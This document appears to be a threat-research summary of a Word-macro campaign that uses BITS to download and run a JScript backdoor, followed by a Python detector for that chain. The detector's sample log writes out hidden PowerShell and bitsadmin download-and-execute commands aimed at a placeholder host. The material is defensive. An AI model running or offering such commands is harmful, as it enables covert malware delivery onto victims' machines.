Investigation into a suspicious Word document led Positive Technologies researchers to various malware hosted on extensive network infrastructure and, ultimately, to the attacker behind the malicious activity. The initial analyzed file was a Word document containing a malicious macro that leverages the BITS PowerShell cmdlet to download and run a JScript file from a remote server. Pivoting from the JScript file, various RTF, LNK, and Word samples were found using either the BITS PowerShell cmdlet or bitsadmin to download and execute the same payload. This JScript file was identified as a WSH backdoor similar to the Houdini worm. After connecting to the C2 server and sending basic system information via HTTP POST requests, the victim host receives backdoor commands such as downloading and uploading files, stealing clipboard contents, and running commands. Examining the C2 server used by this backdoor led to the discovery of a large number of malicious files, including a Houdini variant, a lightweight Java backdoor, a PowerShell Chrome stealer, a PowerShell keylogger, WebBrowserPassView, the NetWire RAT, TCP Listener, xRAT, and a server-side panel/builder for the aforementioned JScript backdoor.
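The delivery chain described above (BITS download via the PowerShell cmdlet or bitsadmin, followed by execution of the dropped script through the Windows Script Host) is what a defender would want to catch in process-creation telemetry. The detector below is an added example, not code from the report; the log records, paths and hostnames are constructed, and the 300-second correlation window is an assumption.

```python
import re
from typing import Dict, List, Set

# Script extensions a WSH backdoor drop would use; the report's payload is JScript.
SCRIPT_EXT = re.compile(r"[\w\\:.%$-]+\.(?:js|jse|vbs|vbe|wsf|wsh)\b", re.I)
BITS_CMDLET = re.compile(r"start-bitstransfer", re.I)              # BITS PowerShell cmdlet
BITS_ADMIN = re.compile(r"bitsadmin(?:\.exe)?.*?/transfer", re.I)  # bitsadmin alternative
WSH_HOSTS = ("wscript.exe", "cscript.exe")
OFFICE_PARENTS = ("winword.exe", "excel.exe")  # macro-bearing document as parent process
WINDOW_SECONDS = 300  # assumed: how long after a download a script launch is still paired

# Constructed, Sysmon-style process-creation records (hypothetical paths and hosts).
SAMPLE_LOG: List[Dict] = [
    {"ts": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'powershell -w hidden -c "Import-Module BitsTransfer; Start-BitsTransfer '
            r'-Source http://example.invalid/upd.js -Destination $env:TEMP\upd.js"'},
    {"ts": 104, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"wscript.exe C:\Users\user\AppData\Local\Temp\upd.js"},
    {"ts": 500, "image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"bitsadmin /transfer job /download http://example.invalid/a.js C:\Users\Public\a.js"},
    {"ts": 900, "image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmd": r"bitsadmin /transfer wu /download http://example.invalid/p.msi C:\Windows\Temp\p.msi"},
]

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()

def script_names(cmd: str) -> Set[str]:
    """Basenames of every script-extension path or URL found in a command line."""
    return {_basename(m.group(0)) for m in SCRIPT_EXT.finditer(cmd)}

def detect(log: List[Dict]) -> List[Dict]:
    """Alert on BITS script downloads and on download -> WSH execution chains."""
    alerts, downloads = [], []  # downloads: (ts, script basenames) seen so far
    for rec in sorted(log, key=lambda r: r["ts"]):
        names = script_names(rec["cmd"])
        if names and (BITS_CMDLET.search(rec["cmd"]) or BITS_ADMIN.search(rec["cmd"])):
            alerts.append({"ts": rec["ts"], "kind": "bits_script_download", "scripts": sorted(names),
                           "office_parent": _basename(rec["parent"]) in OFFICE_PARENTS})
            downloads.append((rec["ts"], names))
        elif _basename(rec["image"]) in WSH_HOSTS:
            for dts, dnames in downloads:  # pair the launch with an earlier matching download
                if rec["ts"] - dts <= WINDOW_SECONDS and names & dnames:
                    alerts.append({"ts": rec["ts"], "kind": "bits_then_wsh", "scripts": sorted(names & dnames)})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The bitsadmin download of an MSI at ts 900 produces no alert, while the Word-spawned PowerShell download at ts 100 is flagged on its own and again when wscript.exe runs the same file four seconds later.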